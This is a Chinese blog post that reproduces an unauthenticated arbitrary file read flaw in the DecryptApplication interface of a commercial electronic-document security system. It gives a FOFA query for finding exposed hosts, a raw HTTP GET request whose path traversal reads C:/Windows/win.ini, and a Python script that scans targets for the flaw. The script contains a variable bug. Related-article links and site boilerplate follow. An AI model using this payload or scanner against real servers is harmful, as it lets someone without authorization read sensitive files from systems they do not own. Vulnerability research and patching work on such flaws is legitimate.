某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞(2024年3月发布)

已于 2024-03-14 18:06:10 修改
阅读量732 收藏 3
点赞数 6
文章标签: 安全
于 2024-03-14 17:59:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73896875/article/details/136717827
版权
漏洞简介

某赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息,导致系统处于极不安全的状态。

漏洞等级高危
影响版本*
漏洞类型任意文件读取
影响范围>1W
产品简介    

某赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。 

网络测绘

FOFA:body="/CDGServer3/index.jsp"

漏洞复现
手动验证POC
GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=ox9wcxwck7g1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

查询C:/Windows/win.ini 文件

python扫描验证脚本
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
@Project :漏洞复现POC 
@File    :某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞.py
@Author  :星之尘
@Date    :2024/3/14 17:36 
@脚本说明:
"""
#影响范围 >1W
import requests
from requests import Timeout
from urllib3.exceptions import InsecureRequestWarning

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
}


def scan(url, path):
    if url.endswith("/"):
        path = "CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=ox9wcxwck7g1"
    else:
        path = "/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=ox9wcxwck7g1"
    if not url.startswith('http://') and not url.startswith('https://'):
        url1 = 'http://' + url
        url2 = 'https://' +url
    encodetext1 = url1 + path
    encodetext2 = url2 +path
    print(f"扫描目标: {url1}")
    print("---------------------------------------------------")
    flag1 = 0
    flag2 = 0
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req1 = requests.get(encodetext1, headers=headers, verify=False, timeout=20)
        if req1.status_code == 200 and "[fonts]" in req1.text:
            flag1 = 1
        req2 = requests.get(encodetext2, headers=headers, verify=False, timeout=20)
        if req2.status_code == 200 and "[fonts]" in req2.text:
            flag2 = 1

        if flag1 or flag2:
            print(f"[+] {url} !!!存在某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞!!!;")
        else:
            print(f"[-] {url} 不存在某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞")
    except Timeout:
        print(f"[!] 请求超时,跳过URL: {url}")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            print(f"[-] {url} 证书校验错误或者证书被拒绝")
        else:
            print(str(e))


if __name__ == "__main__":
    # 在这里输入扫描目标url
    url = ""
    path = "/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=ox9wcxwck7g1"
    scan(url, path)

EternalStarCity
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞复现
0xSec
03-13 753
某赛通电子文档安全管理系统DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息,导致系统处于极不安全的状态。
某赛通电子文档安全管理系统任意文件上传漏洞复现
0xSec
08-16 5791
某赛通电子文档安全管理系统UploadFileFromClientServiceForClient、/CDGServer3/DecryptApplicationService2、/CDGServer3/fileType/importFileType.do等接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
数据泄露防护(DLP)_CDG_V3.8S 客户端使用手册
01-19
本手册指导使用者进行用户管理、业务流程申请与审批管理、文档管理、策略管理、日志管理、终端管理、后台配置等DLP_CDG_V3.8S系统各个模块的业务操作。 本手册的使用对象:公司技术支持部、销售部、市场部、测试部和使用(DLP)系统_CDG_V3.8S产品的客户。
某赛通电子文档系统 DecryptApplication 任意文件读取漏洞
weixin_43567873的博客
03-20 46
某赛通电子文档系统 DecryptApplication 任意文件读取漏洞
某赛通电子文档安全管理系统 UploadFileList 任意文件读取漏洞复现
0xSec
02-01 705
某赛通电子文档安全管理系统UploadFileList 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息,导致系统处于极不安全的状态。
某赛通电子文档安全管理系统 多处 任意文件读取漏洞复现
0xSec
04-27 509
某赛通电子文档安全管理系统UploadFileManagerService、RestoreFiles、downloadfromfile等接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息,导致系统处于极不安全的状态。
某赛通电子文档安全管理系统 PolicyAjax SQL注入漏洞复现
0xSec
01-31 746
由于某赛通电子文档安全管理系统PolicyAjax处的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC
nnn2188185的博客
11-23 333
亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC
某赛通电子文档安全管理系统 多处 SQL注入漏洞复现
0xSec
04-26 1603
某赛通电子文档安全管理系统存在多处SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,进一步利用可获取服务器权限。
针对被易赛通数据泄露防护客户端加密的文件的解密思路
01-06
针对被易赛通数据泄露防护客户端加密的文件的解密思路 本文主要讨论了如何对被易赛通数据泄露防护客户端加密的文件进行解密的思路。由于工作中需要处理敏感数据,公司要求电脑上必须安装易赛通数据泄露防护客户端,...
钓赛通-钓鱼比赛计分软件系统
10-21
钓赛通-是一个全平台的钓鱼比赛计分排名软件(公益项目,永久免费)。共支持(安卓手机,苹果手机,IPad,电脑PC,微信小程序)它功能强大,使用方便。 从钓鱼比赛的报名,比赛签到,比赛抽签,比赛成绩计分,比赛排名...
易赛通解密工具支持rar压缩包解密
11-05
1.可以选择文件或选择文件夹 2.点击还原文件按钮即可 3.点击打开文件目录按钮,如果选择文件则在文件中查找,文件夹同理,找到对应解密的文件即可 注意: 1.本工具软件支持rar压缩包,其他不支持,也没必要支持,...
h5xl:将 HDF5 文件转换为 Excel 工作簿
07-10
h5xl 将 HDF5 文件转换为 Excel 工作簿 h5xl会将 HDF5 文件中的任h5xl或二维数据集转换为 Excel 工作表。 它将以数据集的路径命名工作表,用'.'替换'/'字符'.' . 具有复合 dtypes 的数据集将在工作表的第一行中反映...
protocyt:使用cython将protobuf文件编译成python扩展模块
05-30
测试 运行测试的标准方法: python -m protocyt.tests.test_main 使用nose运行测试: nosetests protocyt --with-doctest --with-coverage --cover-package=protocyt ...赛通 >= 0.13 jinja2 >= 2.5 参数解析
某赛通电子文档安全管理系统-多个接口存在-注入漏洞复现-1day未公开漏洞
weixin_43167326的博客
02-01 363
某赛通Sql注入漏洞新接口
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
最新发布
HACKONE的博客
06-23 105
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
SHA256 安全散列算法加速器实验
weixin_64593595的博客
06-22 1169
SHA256 加速器是用来计算 SHA-256 的计算单元,SHA256 是 SHA-2 下细分出的一种算法。 SHA-2 名称来自于安全散列算法 2(英语:Secure Hash Algorithm 2)的缩写,一种密码散列函 数算法标准,由美国国家安全局研发,由美国国家标准与技术研究院(NIST)在 2001 发布。 属于 SHA 算法之一,是 SHA-1 的后继者。其下又可再分为六个不同的算法标准,包括了: SHA-224、SHA-256、SHA-384、SHA-512、SHA-512/224、SH
【启明智显产品分享】Model4 工业级HMI芯片详解(三):高安全、防抄板
ami82的博客
06-18 648
【高安全、防抄板】随着物联网和智能设备的快速发展,设备安全认证的需求日益迫切。硬件安全认证和保护在确保设备和身份安全中发挥着不可替代的作用,需要与软件安全相结合,共同构建全面的安全体系。
DS-2CDG135-IZ
05-15
DS-2CDG135-IZ 是海康威视公司推出的一款高清网络摄像机,具有以下特点: 1. 可以实现1080P 高清视频传输,具有较高的图像质量; 2. 支持双码流输出,可以满足不同场景下的需要; 3. 支持远程监控和控制,用户可以通过PC、手机等终端进行远程访问; 4. 支持智能分析功能,如人脸识别、区域入侵检测等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值